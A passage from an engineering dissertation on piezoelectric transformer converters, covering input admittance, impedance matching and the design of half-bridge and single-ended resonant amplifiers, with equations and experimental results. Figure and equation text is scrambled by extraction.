plots are shown in Figs. 3.18 (f). and (g). Figure 3.18 (g) is an important plot which shows that Y IN may become inductive when series load resistance R MS is large. Besides, the phase falls into negative values abruptly around 1.97 MHz, and it indicates that operating frequency of the PT converter beyond 1.97 MHz should be avoided. As a result, the PT and its load cannot simply be replaced by a combination of resistor and capacitor unless the operating frequency and load of the PT are fixed. The objective of the IMN is not to match the source impedance of the switching amplifier. Firstly, it is important to maintain high efficiency of the switching amplifier in power electronics applications. The second reason is that the source impedance of the switching amplifier is nearly zero, and it is impossible to deliver infinite available input power under matched condition. Therefore, the IMN is added to maximize the efficiency of the dc/ac inverter and to minimize the circulating current in the input branch of the PT. Normally, IMNs consist of inductive components to compensate for the large input capacitance of the PT, Cd1. Moreover, the IMNs can be built into the dc/ac inverters so that the output impedances of the dc/ac inverters are inductive over the operation frequency range. If the efficiency of the dc/ac inverters had been assumed to be maximized to the resistive loads [43], in such conditions, the IMN could be an inductor or a simple L-matching network. 72 PT Input matching network Y LOPT Y IN (a) Phase angle of Y IN Y IN : input admittance 0.02 0.03 0.04 0.05 20 30 40 50 60 70 1.8 1.88 1.92 2.0 (Fs : MHz) (b) 1.96 1.84 1.8 1.88 1.92 2.0 (c) 1.96 1.84 YLOPT= 1/Z1.92at 1.92 MHz calculated with two-port parameters measured by HP 4194A calculated with lumped model YLOPT= 1/Z1.92at 1.92 MHz calculated with two-port parameters measured by HP 4194A calculated with lumped model (Fs : MHz) Fig. 3.18. Input characteristics of LVPT-21. (a) input network. (b) input admittance. (c) phase angle of the input admittance. The input admittance is capacitive over a wide range of operating frequencies when the load is optimized at 1.92 MHz. The capacitive characteristics might be cooperated into amplifier circuit design as a part of resonant or filtering circuits. 73 0 50 100 150 0.02 0.06 0.1 0.14 (d) YIN : input admittance with lumped model with two-port parameters LMS = 450 nH f = 1.91 MHz f = 1.92 MHz 0 50 100 150 30 40 50 60 70 80 : Angle of input (e) with lumped model with two-port parameters RMS : Load resistance of ZL () LMS = 450 nH f = 1.91 MHz f = 1.92 MHz (f) RMS : Load resistance of ZL () 1.9 1.92 1.94 1.96 1.98 2 0.1 0.2 0.3 0.4 (g) 1.9 1.92 1.94 1.96 1.98 2 -100 -50 0 50 100 YIN ( Fs : MHz ) ( Fs : MHz ) 10 30 60 100 200 400 Rload Rload = 10 Fig. 3.18. (d) input admittance vs. RMS with operating frequencies as running parameter. (e) its phase angle. (f) 3-D plot of the input admittance. (g) 3-D plot of its phase angle. When load resistance is very high, the input admittance is almost like a pure capacitor. However, the phase of the input admittance becomes negative when RMS increases and frequency is beyond 1.96 MHz. This will change the performance of the power amplifier dramatically. 74 (a) YIN : input admittance ( x 1e-6) with lumped model measured by HP 4194 65 kHz 70 kHz 75 kHz 200 300 400 500 with lumped model measured by HP 4194 30 40 50 60 70 80 65 kHz 70 kHz 75 kHz (b) Angle of YIN : degree Rload = 100 k Rload = 505 k Rload = 295 k Rload = 100 k Rload = 505 k Rload = 295 k 200 400 600 800 (c) 65 67 69 71 73 75 0 (d) 65 67 69 71 73 75 0 20 40 60 80 100 Fs Fs (kHz) YIN : input admittance ( x 1e-6) Fs (kHz) Angle of YIN : degree 40 60 90 150 200 400 Rload (k) 40 60 90 150 200 400 Rload (k) Fig. 3.19. Input characteristics of HVPT-2. (a) input admittance vs. operating frequencies with load resistance as running parameter. (b) its phase angle. (c) 3-D plot of YIN. (d) 3- D plot of its phase angle. The measured and simulated results of YIN agree with each other. This validates the characteristics of the model again. From (c) and (d), the phase of YIN is always positive, and hence, YIN is capacitive under the normal operating conditions. As a result, the amplifier design is easier and the soft-switching technique can be applied. 75 3.3.1.2 Longitudinal Mode PT (HVPT-2) Figure 3.19 (a) and (b). illustrate the input admittance vs. frequency characteristics of HVPT- 2 with resistive load as running parameters. The thin lines represent curves of Y IN calculated by the lumped model of LVPT-2 and show agreement with those measured directly with impedance analyzer. In Fig. 3.19 (c) and (d), the 3-D plot in (d) illustrates the phase angle of the input admittance, and it is always positive as long as the load resistance Rload is greater than 40 k for HVPT-2. Therefore, Y IN of HVPT-2 is capacitive over a wide range of operating frequencies and load resistances. Besides, there is no abrupt phase drop as shown for LVPT-21; this makes it possible to use either constant-frequency or variable-frequency control to control the voltage gain of the converter with HVPTs. 3.3.2 Study of Output Impedance for Amplifiers Previewing the topologies for switching dc/ac inverters or amplifiers in Chapter 4 indicates that they can be divided into two categories. The first category can be simplified to a square- wave or quasi-square-wave source accompanied with a resonant tank or a low-pass filter. So the output of the resonant tank is sinusoidal which is most desirable for the PT. The source impedance is very small for the switching amplifier. The output impedance of the amplifier is reactive and dependent on the operating frequency. The other topology consists of a switch and resonant inductor only. When the switch is turned on, the output impedance is zero. When the switch is turned off, the output impedance is essentially inductive. From the study above, the characteristics of the output impedance of switching amplifiers in the next chapter depict that the design of IMNs can be incorporated into the design of dc/ac inverters. 3.4 Summary The power-flow method can be applied to both HVPTs and LVPTs. In order to obtain the two-port parameters to perform this method, a network analyzer or impedance analyzer is needed. Nevertheless, both analyzers are very expensive. A conventional method was proposed to decide the optimal load by knowing the output capacitance of the PT, Cd2, and its mechanical resonance frequency, fs. This method is especially useful for the HVPTs for its high output impedance and lower frequency operation. On the contrary, the power-flow method must be adopted in finding the optimal load of the LVPTs. Based on the optimal load, decided by power flow model, the matching networks for the PT were designed and implemented to obtain an optimal power gain of the PT. However, the total efficiency for the PT and matching networks turned out to be lower than expected, because the inductances of matching inductors were relatively low and could not be tuned continuously for the thickness vibration PTs. Besides the optimal termination of the PT, the other parameters that will affect the efficiency of the PT converters include support points of the PT, input matching network designs, and power amplifier or dc/ac inverter designs for PT converters. The first three issues were discussed in Chapters 2 and 3. The amplifier design will be introduced in the next chapter. 76 4. Design Tradeoffs and Performance Evaluations of Power Amplifier Topologies 4.1 Introduction The function of a typical power amplifier is to increase the amplitude of the signal to a larger value for higher power applications. The power amplifiers specified in this chapter are actually dc/ac switching inverters having sinusoidal waveforms at outputs, and the frequency of the sinusoidal waveforms is equal to the switching frequency of the switches. It is possible to use conventional power amplifiers to drive the PTs, but apparently the efficiency of the power amplifiers is lower than that of switching amplifiers. Because PTs are low-power devices, the general requirements for the applications of PTs include low-power, low cost, and high efficiency. It is important to reduce the number of inductive components and switches in amplifier or dc/ac inverter designs for PT applications. In order to study all possible interactions between PTs and amplifier circuits, LVPT-21 is chosen in this chapter as the example PT. Constant-frequency control is adopted to prevent operating LVPT-21 between spurious vibration frequencies where variable frequency control of the LVPT-21 is impossible to achieve. Therefore, the performance of the amplifier circuits is evaluated with the load, including LVPT-21 and its output rectifier circuit, under two possible operating frequencies of 1.92 and 1.96 MHz, as concluded in Chapter 3. At the same time, the optimal loads of LVPT-21 are calculated by the power flow method with two-port parameters at two different frequencies. As a result, the loads for the amplifier circuits are known, and it is feasible to design the amplifier circuits or desired output matching networks. Because of no spurious vibration for most of HVPTs, either constant and variable frequency control can be applied to HVPT-2, and it will be introduced in Chapter 5. It seems feasible to utilize resonant circuits or low-pass filters to generate sine waveforms to the input of PTs. They are half-bridge parallel-resonant amplifiers, single-ended multi-resonant (SE-MR) amplifiers [45], and a family of single-ended quasi-resonant (SE-QR) amplifiers [17,23]. The design curves and their associated design examples by using LVPT-21 as a step-down 77 transformer are given for half-bridge and single-ended amplifier circuits. The load of amplifier circuits includes LVPT-21 and its output rectifier circuit. Finally, the performances of different amplifier circuits are compared for efficiency, component counts, and suitability. 4.2 Half-Bridge PT Converter 4.2.1 Operational Principles of Half-Bridge Amplifier The half-bridge amplifier can be decomposed to a square wave source, generated by two complementary switches, and a parallel resonant circuit. Figure 4.1 shows the circuit diagram of a half-bridge amplifier and its theoretical waveforms. C B is the blocking capacitor. L R and C IN form the low-pass filter, and C IN might be replaced by the input intrinsic capacitor of the PTs. The low- pass filter is needed to prevent the harmonic contents from entering into the PTs and is regarded as an input matching network. From the theoretical waveforms shown in Fig. 4.1 (b), the ZVS operation can be achieved naturally when the switching frequency Fs is greater than the tank resonant frequency Fo, where Fo L C R IN 1 2 , (4.1) and the load characteristic is inductive. However, when R IN becomes small, the resonant inductor current will decrease accordingly. Thus, the ZVS operation will be lost, as shown by the dotted line in Fig. 4.1 (b). Therefore, La is used to assure zero-voltage switching on S 1 and S 2 . This type of amplifier was introduced to drive PT converter circuit in [20]. More detailed design considerations are presented in the following sections. 4.2.2 Equivalent Circuit of the Half-Bridge PT Converter Because the nature of the half-bridge amplifier is similar to that of the buck converter, it is suitable for step-down applications, and it can be operated either by constant- or by variable- frequency control. Figure 4.2 shows a complete LVPT dc/dc converter powered by a half-bridge inverter or amplifier. Because the input voltage and current waveforms of the LVPT-21 are sinusoidal, the input impedance Y IN can be calculated directly from the model derived in Chapter 2 and is represented by a parallel combination of R IN and C IN . R IN and C IN are functions of R L and Fs, and are shown in Fig. 4.2 (b). For example, R IN = 35 and C IN = 1350 pF when R L = 10 and Fs = 1.96 MHz from Fig. 4.2 (b). The square-wave source shown across La can be approximated by its first order harmonics and V V D S IN 2 1 2 cos( ) , (4.2) 78 (a) (b) ILR VS2 VGS1 VGS2 Vd1 S1 S2 + VS2 _ + Vd1 _ ILR large RIN small RIN Ts = 1/Fs Fs Fo > LR CIN 1 2 D Ts LR CIN RIN Fig. 4. 1. Half-bridge amplifier and its theoretical waveforms. (a) half-bridge amplifier. (b) theoretical waveforms. When R IN becomes smaller, the resonant frequency will move to a smaller value for the typical operation of a parallel resonant circuit. Therefore , ZVS will be lost if no external inductor is added to help discharge the capacitors of the switches. 79 VIN La 2 : 1 LVPT (LVPT-21) LM RL Cf CB S2 S1 Rload = R R EQ L 8 2 YIN LR s s' + Vo _ (a) 0 40 60 80 2 4 6 8 20 Fs = 1.96 MHz 1.92 MHz CIN (nF) (b) RL () 0 20 40 60 80 0 20 40 60 RIN () Fs = 1.96 MHz 1.92 MHz RL () + Vd1 _ (c) RIN Vs CIN s s' ZCONV LR 10 10 j CIN + 1 RIN YIN Fig. 4. 2. Complete half-bridge PT converter and its equivalent circuit. (a) half-bridge PT converter. (b) RIN and CIN of the LVPT-21. (c) equivalent circuit. RIN and CIN are the parallel combination of YIN which is a function of RL and Fs. The higher the RL, the smaller the RIN. Therefore, La is added to help achieving ZVS operation while qp becomes small. 80 where D is the duty cycle of the half-bridge amplifier and is less than 0.5. In order to provide enough dead time between two gate drives and enhance transient response performance, the maximum duty cycle is chosen between 0.35 to 0.4. Figure 4.2 (c) shows the equivalent circuit of a half-bridge PT converter; the input power stage of the half-bridge amplifier is equivalent to a sinusoidal source Vs, and the PT and its load Z L are represented by R IN and C IN . As a result, the equivalent circuit does not include any active switch, and it can be analyzed by employing a software program in MATLAB. 4.2.3 DC Characteristics and Experimental Verifications In Chapter 3, the possible operating frequencies for LVPT-21 to obtain satisfactory efficiencies and voltage gains are 1.92 MHz and 1.96 MHz. Since the operating frequencies and optimal load Rload and matching inductance L M of LVPT-21 are all predetermined in section 3.3.3.1, the only design parameter left is L R . Figure 4.3 (a) depicts the phase angle of the input impedance of the converter Zconv. vs. the load resistance R L with L R as the running parameters at 1.92 MHz and 1.96 MHz, respectively. When R L is less than 10 , the phase angles of Z CONV become negative for L R = 1H and 1.5H. This indicates that the ZVS operation of the half- bridge amplifier is lost if there is no extra La added. By adding an inductor La = 6 H, the phase angles of Z CONV shown in Fig, 4.3 (b) are positive. Therefore, the impedance characteristic of the half-bridge converter is inductive and ZVS on the switches are maintained. The voltage gains of the converter are shown in Fig. 4.3 (c) when D = 0.36. It can be seen that the higher L R is, the more easily the switches can achieve the ZVS operation. However, the gain of the converter decreases when L R becomes large. To verify the previous results for the equivalent circuit, a half-bridge LVPT converter was built with the following parameters and input-voltage values: Vin = 25 Vdc, D = 0.36, L R = 1.6 H, and L M = 420 nH. Figure 4.4 shows output voltages vs. load resistance R L at 1.92 and 1.96 MHz. The waveform with solid line is simulated by MATLAB for the equivalent circuit of the half-bridge LVPT converter. The waveform with square symbols is generated by the SIMPLIS software program for circuit simulation. The last curve shows the experimental results. These three curves are close to each other and well explain the usefulness of the lumped model of LVPT-21 and its associated equivalent circuit for the half-bridge PT converter. 81 (b) Phase of Zconv (degree) Phase of Zconv (degree) 0 40 60 80 0 0.4 0.8 1 20 1 1.5 2 2.5 3.5 LR 0 20 40 60 80 0 0.4 0.8 1 1.5 2 2.5 3.5 LR Fs=1.96 MHz RL () RL () 1 Voltage gain : Vo/Vin Voltage gain : Vo/Vin 10 Fs=1.92 MHz 0 20 40 60 80 0 40 80 0 20 40 60 80 0 40 80 0 20 40 60 80 0 40 80 0 20 40 60 80 0 40 80 RL() RL () RL () RL () (a) (c) Fs=1.96 MHz Fs=1.92 MHz Fs=1.96 MHz Fs=1.92 MHz 1 1.5 2.5 3.5 LR 1 1.5 2.5 3.5 LR 1 1.5 2.5 3.5 LR 1 1.5 2.5 3.5 LR La = 6 La = 6 Fig. 4.3. DC characteristics of the half-bridge LVPT converter. (a) phase angle of the input impedance Z CONV . (b) phase angle of the input impedance in parallel with La. (c) voltage gain of the converter. Both results have been calculated by MATLAB. 82 0 20 40 60 4 6 8 10 12 14 0 20 40 60 4 6 8 10 12 14 (RL : ) (RL : ) Fs = 1.96 MHz Fs = 1.92 MHz Vo simulated by SIMPLIS simulated by lumped model measured results simulated by SIMPLIS simulated by lumped model measured results Vo (a) (b) Fig. 4. 4. Output voltage of the half-bridge PT converter. (a) Fs = 1.92 MHz. (b) 1.96 MHz. The voltage curves with solid line are calculated by MATLAB with the lumped model of the converter. The curves with square makers are simulated by SIMPLIS, and the curves with circle maker are measured results. Measurements are taken when Vin = 25 Vdc, D = 0.36, and LR = 1.6 uH. Another experimental result for verification purposes is shown in Fig. 4.5 which illustrates output voltage Vo vs. Fs, and again the solid line is calculated by MATLAB with the equivalent circuit for the LVPT converter. The curve with square symbols is also calculated by MATLAB, except that the model of the LVPT-21 is based on the measured two-port parameters and the third curve shows the experimental results. The last two curves are almost identical in shape; however, a frequency shift is observed. Figure 4.5 (b) shows the output-voltage curves measured at different power levels. This tells that the mechanical resonant frequency of LVPT-21 is changed by the amount of power processed by the PT. When the power level is low, the input impedance of the PT is similar to that measured by impedance analyzer. Figure 4.5 (c) suggests that the efficiency at 1.96 MHz for LVPT-21 is better than that at 1.92 MHz. So Fs is chosen as 1.96 MHz in the final design example. Besides, the constant-frequency control is adopted because the voltage gain characteristic shown in Fig. 4.5 (a) is not monotonous. 83 20 40 60 0.7 0.8 (RL : ) measured at Fs = 1.96 MHz measured at Fs = 1.92 MHz Efficiency for power stage of the half-bridge converter 16 12 (Rload : ) Vin = 25Vdc, D = Measured voltage gain of LVPT-21 1.92 1.94 1.96 0.4 0.5 0.6 0.7 1.9348 ZL = 10 + 80 nH output power = 14 Watts output power = 8.1 Watts output power < 0.1 Watts 6 7 1.9 1.92 1.94 1.96 1.98 2 (Fs : MHz) simulated by two-port Para. simulated by lumped model measured results 5 Vo Vin = 25V D = 0.36 RL = 10. (Fs : MHz) (a) (b) (c) Fig. 4. 5. Efficiencies and output voltage of the half-bridge PT converter. (a) output voltage vs. switching frequency Fs. (b) shift on resonant frequency. (c) efficiencies of the PT converter. Measurements in (a) and (b) are taken when Vin = 25 Vdc, D = 0.36, and LR = 1.6 uH. From (a), it can be observed that the experimental voltage curves shift about 50 kHz from the calculated curves, because the voltage-gain curves for LVPT- 21 shift with the output power level, as shown in (b). 84 4.2.4 Design Guidelines and Experimental Results The specifications of the LVPT converters are given below: Input voltage = 44 - 52 Vdc, Output voltage = 12 Vdc, and Output Power = 14.4 watts (maximum) The voltage gain of the converter is around 0.25 and the R L = 10 under maximum output power. From Fig. 4.3 (c) for Fs = 1.96 MHz, L R falls between 1.5 H and 2 H. L R = 1.6 H is chosen. La is calculated so that the peak stored inductor energy is greater than the total energy required to discharge the combined capacitor of S 1 and S 2 . To simplify the derivation, assuming that D = 0.5, the objective equation to decide La is 1 2 1 2 2 2 La i C V pk T IN , (4.3) where C T is the total capacitance of a shorted and a full charged parasitic capacitance of the switches and can be found separately from the data sheet of the switch. The peak current of La, i pk , is one half of the current charged by Vin/2 when S 1 is turned on. i V La Fs pk IN 8 (4.4) Substituting (4.4) to (4.3), La is solved as La C Fs T 1 64 2 . (4.5) La needs to be chosen carefully so that the magnitude of the circulating current is minimized and ZVS operation is kept. Figure 4.6 (a) illustrates the complete power stage of the PT converter and its component values. La is calculated as 6.56 H when Fs = 1.96 MHz and C T = 620 pF for the MOSFET IRF 520. The salient waveforms are shown at the bottom in Fig. 4.6. The waveform of Vd2 is almost sinusoidal compared to the input voltage waveform Vd1 of the PT. This illustrates the band-pass and high-Q characteristics of LVPT-21. Figure 4.7 shows the efficiencies of the PT converter when L R = 1.6 and 0.8 H. The efficiency for L R = 1.6 H is better than that for L R = 0.8 H because of higher duty-cycle operation for the former L R . The best efficiency is 84 % when output power is 10 Watts. 85 (a) + VS2 _ 2 : 1 LVPT IRF 520 IRF 520 5.8 1 F 1.6 H 0.3H + Vd1 _ + Vd2 _ 0 0 0 0 Vd2 20 V/div. Vd1 50 V/div. VS2 50 V/div. VGS2 10 V/div. (b) 1.96 MHz 2 F 100 ns/div. RL Cf LM 48 V CB LR S2 S1 Vo = 12 Vdc Fig. 4. 6. Design example of the half-bridge PT converter. (a) power stage. (b) experimental waveforms. 86 0.2 60 0.4 30 0.6 20 0.8 15 1 12 1.2 10 0.5 0.6 0.7 0.8 IL (A) RL () 0.1 120 0.85 Efficiency of the half-bridge PT Vo = 12 Vdc, Fs = 1.96 MHz, Dmax = 0.4 LR= 1.6 uH LR= 0.8 uH Fig. 4. 7. Efficiencies of the half-bridge PT converter. When LR = 1.6 H, the maximum efficiency occurs around RL = 12 which is close to the optimal load resistance calculated by the power flow method in Chapter 3. When L R = 0.8 H, the characteristic impedance decreases and voltage gain increases, and so does the current stress in the switches. Therefore, the conduction loss of the converter increases, and efficiency reduces by 10%. 4.3 Single-Ended Multi-Resonant PT Converter 4.3.1 Operational Principles of SE-MR Amplifier A single-ended multi-resonant (SE-MR) amplifier [45], shown in Fig. 4.8 (a)., is capable of delivering a sinusoidal voltage to the load R IN and achieving zero-voltage switching for the main switch. C B is the blocking capacitor, and the DC bias is equal to V IN . This is a multi-resonant converter. When S 1 or its anti-parallel diode conducts, the resonant frequency is determined by LR and C IN . While S 1 is turned off, the resonant frequency is decided by L R and the parallel 87 combination of C IN and C S . Compared to the SE-MR amplifier, the class E amplifier [43-44] does not utilize the input capacitor of the PT as a resonant component. But the class E amplifier does not need the blocking capacitor; however, the size of the blocking capacitor is small due to the high-frequency operation. So the SE-MR amplifier was chosen as a design example in the multi- resonant converter family. Figure 4.8 (b). illustrates the theoretical waveforms of the SE-MR amplifier. i VIN CB LRF S1 + VS1 _ LR CIN Vd1 VS1 i VGS1 (a) (b) RIN + Vd1 _ CS Fig. 4. 8. Single-ended multi-resonant (SE-MR) amplifiers. (a) Power stage. (b) theoretical waveforms. 88 4.3.2 Equivalent Circuit of the SE-MR PT Converter Figure 4.9 (a) shows the block diagram of a SE-MR PT converter. Because the model of the PT has been derived earlier, it is possible to incorporate the PT model and other components of the converter into circuit simulation program directly. This is probably the best way to analyze any multi-resonant related converter. However , the PT and its load can be represented by a frequency and load dependent impedance which is mentioned in the section discussing the half- bridge PT converter. Using the fact that the waveform of Vd1 is nearly sinusoidal makes it possible to simplify the PT and its load as a parallel connection of R IN and C IN in Fig. 4.9 (b). j C IN + 1 R IN Y IN S1 + VS1 _ LR YLOAD PT YIN (Freq. , YLOAD) (a) (b) + Vd1 _ CS VIN CB LRF S1 + VS1 _ LR CIN RIN + Vd1 _ CS Fig. 4. 9. SE-MR PT converter and its equivalent circuit. (a) block diagram of power stage. (b) equivalent circuit of SE-MR PT converters. 89 4.3.3 DC Characteristics The equivalent circuit of the SE-MR PT converter consists of the SE-MR amplifier and the PT model. Because the active switch exists in the equivalent circuit, it is very tedious to find an analytical solution for the state variables such as inductor current and capacitor voltages for multi- resonant circuits. Therefore, the DC analysis of the multi-resonant converter can only be studied via software circuit simulation programs where the steady-state or the periodic solutions of the state variables can be resolved. The DC analysis of the SE-MR PT converter is carried out by employing a software program SIMPLIS. For the purpose of designing the power stage of the SE-MR amplifier, the voltage ratio M is equal to M Vd V RMS IN 1 ( ) , (4.6) where Vd1 (RMS) is defined as the RMS voltage at the output of the amplifier. Vs_max is the maximum voltage stress of S 1 , and C n is C IN /C S . The characteristic impedance and the resonant frequency can be defined as: Z L C o s s (4.7) F L C o S S 1 2 . (4.8) All the voltages and switching frequencies are normalized as follows: v v V n IN , (4.9) F F F n S o , (4.10) q R Z P IN o . (4.11) 4.3.4 Design Guidelines and Experimental Results Figure 4.10 shows M and Vs_max vs. normalized frequency Fn employing q p as running parameters for C N = 2, 3, and 4. The optimal frequency is chosen between 0.7 and 0.9. The upper limit is obtained to ensure the ZVS operation on S 1 , and the lower limit is set for minimizing the voltage stress of S 1 . From Fig. 4.10, the design steps are: Step 1: Pick a C N Step 2: Choose the voltage conversion ratio. Vd1 (RMS) is calculated according to the output power and efficiency PT of the PT and the rectifier circuit. 90 (c) 0.6 0.7 0.8 0.9 1 2 2.5 3 3.5 4 4.5 5 CS = 4 CIN qp=0.4 0.2 0.1 0.6 0.7 0.8 0.9 1 2 2.5 3 3.5 4 4.5 CS = 3 CIN qp=0.5 0.4 0.2 (a) (b) 0.6 0.7 0.8 0.9 1 0 0.2 0.4 0.6 0.8 CS = 4 CIN qp=0.4 0.3 0.2 0.1 qp=0.5 0.6 0.7 0.8 0.9 1 0 0.2 0.4 0.6 0.8 1 0.4 0.3 0.2 CS = 3 CIN M = Vd1(RMS)/VIN 0.6 0.7 0.8 0.9 1 0 0.2 0.4 0.6 0.8 1 CS = 2 CIN qp=0.5 0.4 0.3 0.2 Normalized Max. voltage stress of VS1 0.6 0.7 0.8 0.9 1 2.5 3 3.5 4 4.5 CS = 2 CIN qp=0.2 0.4 0.3 0.5 Fig. 4. 10. Normalized voltage gain and voltage stress of SE-MR amplifiers. (a) Cn = 2. (b) Cn = 3. (c) Cn = 4. The break points indicate where the ZVS is lost. Since the optimal load of the PT and operating frequencies are predetermined, LR is the only design parameter left. The calculated results are simulated by the SIMPLIS software program. 91 Vd Pout R RMS IN PT 1 ( ) (4.12) M Vd V RMS IN 1 ( ) (4.13) Step 3: Choose q p and F n . From a calculated M, the lower and upper limits of qp are determined from Fig. 4.10. The lower limit of qp is set to determine the minimum Fn, and the upper limit of qp is used to determine the maximum Fn. Fn should be located between 0.7 and 0.9. Step 4: Find L R , Cs, and C IN . Once Fn and qp are known, Cs is calculated by Cs Fn Fs Zo Fn q Fs R p IN 2 2 , (4.14) where Fs is the switching frequency of the converter and R IN is shown in Fig. 4.2 (b). The specifications for the design example are identical to those for the half-bridge converter in 4.2.4. LVPT-21 is used as a step-down transformer. Since maximum output power is equal to 14.4 Watts and PT = 0.9, Vd1 (RMS) is calculated to be 23.66 Volts when Fs = 1.96 MHz, R IN =35 , and C IN =1.35 nF shown in Fig 4.2 (b). The voltage ratio M = 23.66/48 = 0.49. Table 4.1 tabulates the values for Fn, Vs_max, Cs, and L R for different values of C N when qp = 0.3 and 0.4, respectively. When C N = 4, the highest Vs_max is obtained. It is appropriate to adopt the results calculated when C N = 2 or 3. The final design selects C N = 3 because the parasitic capacitance of the MOSFET and the input capacitance of LVPT-21 are fully utilized under the full load condition. From Table 4.1, Cs = 500, L R = 6.8 F and three times of Cs is 1500 pF. The normalized maximum voltage stress is 3.85. 92 Table 4.1. Calculated parameters for the SE-MR LVPT converter at Fs = 1.96 MHz. Cn Fn Vs_max Cs Cs x Cn LR 2 3 4 0.72 0.72 0.7 3.65 3.85 4.15 500 pF 500 pF 487 pF 6.8 6.6 qp = 0.3 1 nF 1.5 nF 1.9 nF 6.8 Cn Fn Vs_max Cs LR 2 3 4 0.85 0.83 0.78 3 3.3 3.7 789 pF 770 pF 724 pF 6 5.5 qp = 0.4 1.6 nF 2.3 nF 2.9 nF 5.9 Cs x Cn When Cn = 4, the highest normalized voltage stress is obtained and extra capacitor is needed to add on the input of the PT for CIN = 1.35 nF. The calculated parameters for both Cn = 2 and 3 can meet the design requirements. When Cn = 2 and qp = 0.4, Fn = 0.86. S1 will lose the ZVS operation when RL is increased and RIN decreased in Fig. 4.2 (b). When Cn = 3 and qp = 0.3, Cs and 3 x Cs are close to output capacitances of S1 and CIN respectively; they are chosen in the experimental circuit. 93 0 0 0 Vd2 50 v/div. Vd1 50 v/div. Vs1 50 v/div. Vs1 Vgs1 100 ns/div. S1 + VS1 _ RL 2 : 1 LVPT 0.3H + Vd2 _ IRF 620 1 F 6 mH 5.5H 2 F + Vd1 _ 48 V Vo = 12 Vdc LR (a) (b) Fig. 4. 11. Design example of the SE-MR PT converter. (a) power stage. (b) experimental waveforms. The experimental circuit is shown in Fig. 4.11 (a), the inductance for L R changes slightly so that no extra capacitances are required to add to Cs and C IN while the same voltage gain is kept. From the experimental waveforms in Fig. 4.11 (b), the maximum voltage stress of S 1 is 180 Vdc 94 which is similar to the simulation results. The best efficiency of this converter for the power stage is 81 %. 4.4 Single-Ended Quasi-Resonant (SE-QR) PT Converter 4.4.1 Operational Principles of the SE-QR Amplifier 4.4.1.1 SE-QR Amplifiers This family of this type of amplifier circuit had been found in [10,17]. Figure 4.12 (a). shows the SE-QR amplifier with a load R IN and the resonant capacitor C IN . The amplifier includes only a resonant inductor L R and a switch S 1 . Compared to the SE-MR amplifier, the resonant tank is composed of L R and C IN and is only activated when the switch is turned off as shown in Fig. 4.12 (b). When the switch is on, the resonant inductor is charged linearly by the input voltage. Figure 4.12 (c). illustrates the theoretical waveforms of a SE-QR amplifier. The DC level of the resonant inductor current I LR is determined by the load resistance R IN as well as the characteristics impedance of the resonant tank Z o , where Z o L C R IN . (4.15) Therefore, the efficiency of this amplifier decreases when load current or Z o decreases. 4.4.1.2 Flyback SE-QR Amplifiers For the purpose of providing isolation and controlling the voltage gain, a flyback version of the SE-QR amplifier is introduced in Fig. 4.13 (a) and its theoretical waveforms are shown in Fig. 4.13 (b). Inductor L P with a secondary winding L R is used as both a resonant inductor and a step- up or step down transformer depending on the applications. Adding the secondary winding in L P can be avoided if a designated step-up or step-down ratio of the PT can be designed in the beginning phase for a particular application. During the first stage, either S 1 or its anti-parallel diode is on, and the current in L P is charging up while part of the energy is transferred to the load resistance. This is the major difference between the basic and flyback SE-QR amplifiers. At t0, S 1 is turned off and the primary current approaches zero because the capacitance, C IN , of the PT to the primary side is much larger than the stray capacitance of the S 1 . The voltage waveform of S 1 is actually shaped by the resonant circuit in the secondary side. Not until the voltage of S 1 reaches zero will the current flow in the secondary side. At t1, the anti-parallel diode conducts and current begins to flow in the primary side in the opposite direction. Before the primary current charges to the positive direction, S 1 is turned on with ZVS, and stage 1 resumes. 95 (c) (a) CS VIN LR S1 + VS1 _ CIN RIN ILR VS1 VGS1 ILR toff ton (b) CS+CIN LR [ toff ] VIN RIN LR [ ton ] VIN Fig. 4. 12. Single-ended quasi-resonant (SE-QR) amplifier. (a) power stage. (b) topological stages. (c) theoretical waveforms. 96 ILP 1 : NR V IN S1 L R L P - VS1 + ILS VS1 ILP ILS VGS1 t0 t1 (a) (b) CIN RIN Fig. 4. 13. Flyback SE-QR amplifier. (a) power stage. (b) theoretical waveforms. This topology provides isolation and design of voltage conversion ratio by adjusting the turns ratio of the transformer. 97 4.4.2 Equivalent Circuit of the SE-QR PT Converter This amplifier is connected to the input side of the PT. Although the current flowing inside of the PT is sinusoidal due to the very high Q from the characteristics of the PT, the input voltage waveform of the PT ,V S1 , is a quasi-square one. The concept of the driving point impedance is no longer valid under these voltage and current waveforms. In other words, the excitation force V S1 at Fs is not sinusoidal and contains strong second, third, and other high harmonic components. It can not be modified to a sinusoidal waveform with fundamental component only. Figure 4.14 (a) shows the block diagram of a SE-QR PT converter. Because the characteristics of the input impedance of the PT are capacitive under normal operation, as shown in Chapter 3 for LVPT-2, it is possible to find a parallel combination of capacitor C IN and resistor R IN shown in Fig. 4.12. to simulate the effect of PT and its load Y LOAD . To find the resistance R IN , the power balance between the power delivered to load Pout and the equivalent power consumed in R IN is assumed. The output power of the PT Pout is equal to ( ) Pout Vd Y RMS LOAD 1 2 ( ) Re , (4.16) and Vd1 is Vd V Freq Y V GAIN PT LOAD S st 1 1 1 _ _ ( ., ) , (4.17) where V GAIN_PT is the voltage gain of the PT calculated by its lumped model, and V S1_1st is the fundamental harmonic of V S1 , as shown in Fig. 4.14 (b). Due to the high Q characteristics for the mechanical branch of the PT, the output voltage of the PT Vd2 is sinusoidal at Fs which is the fundamental component of V S1 . As a result, the voltage gain of the PT can be calculated by its lumped model as written in (4.17). The normalized vcn_1st is independent of load as long as qp is large, because it is a parallel resonant circuit whose voltage gain is load-insensitive. Since vcn_1st and V GAIN_PT are known, the output power of the PT is determined for the given V IN and Y LOAD . In a similar manner, the normalized vcn with its root-mean-square value can be calculated, and R ACP is used to replace R IN and to represent the power delivered to PT: ( ) R V Pout ACP S RMS PT 1 2 ( ) , (4.18) where PT is the efficiency of LVPT-21. As far as C IN is concerned, the capacitance of C IN is used to resonate with L R and to shape the voltage waveform V S1 . In Fig. 4.14 (a), when S 1 is turned off, the amount of current flowing into Cd1 is much larger than that flowing in the mechanical branch of the PT. As a result, it is reasonable to assume that the voltage across S 1 is shaped by L R and the input capacitance Cd1 of the PT under the condition that the characteristic impedance of the mechanical branch of the PT is very high. The complete equivalent circuit for the SE-QR PT converter is shown in Fig. 4.14 (c). Although an active switch is included in the equivalent circuit, the analytical solutions for the inductor current and the capacitor voltage are derived. Therefore, the DC characteristics of the equivalent circuit can be calculated by employing a software program in MATLAB. 98 (c) CIN = Cd1 + VS1 _ (a) (b) Vd2 V Freq Y GAIN PT LOAD _ ( ., ) V S st _ 1 1 V S st _ 1 